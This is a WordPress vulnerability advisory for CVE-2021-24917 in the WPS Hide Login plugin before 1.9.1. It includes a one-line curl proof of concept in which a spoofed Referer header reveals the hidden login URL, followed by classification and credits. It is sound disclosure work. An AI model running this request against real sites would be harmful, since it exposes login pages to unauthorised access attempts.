WordPress Plugin Vulnerabilities

WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header

Description

The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.

Proof of Concept

curl --referer "something" -sIXGET https://example.com/wp-admin/options.php
HTTP/2 302 
...
location: https://example.com/secret-login/?redirect_to=%2Fwp-admin%2Fsomething&reauth=1

Affects Plugins

Plugin icon
wps-hide-login
Fixed in 1.9.1

References

CVE
CVE-2021-24917
URL
https://wordpress.org/support/topic/bypass-security-issue/

Classification

Type
INCORRECT AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-863
CVSS
5.3 (medium)

Miscellaneous

Original Researcher
Daniel Ruf, Thalakus
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
15bb711a-7d70-4891-b7a2-c473e3e8b375

Timeline

Publicly Published
2021-10-27 (about 2 years ago)
Added
2021-11-02 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2022-08-15
Title
Visual Portfolio < 2.19.0 - Contributor+ CSS Injection
Published
2023-07-14
Title
Export and Import Users and Customers < 2.4.2 - Shop Manager+ Privilege Escalation
Published
2022-11-21
Title
Car Dealer < 3.05 - Subscriber+ Arbitrary Plugin Installation
Published
2023-04-26
Title
WooCommerce Multivendor Marketplace – REST API < 1.6.0 - Subscriber+ Arbitrary Orders Item And Notes Update
Published
2022-11-21
Title
StopBadBots < 7.24 - Subscriber+ Arbitrary Plugin Installation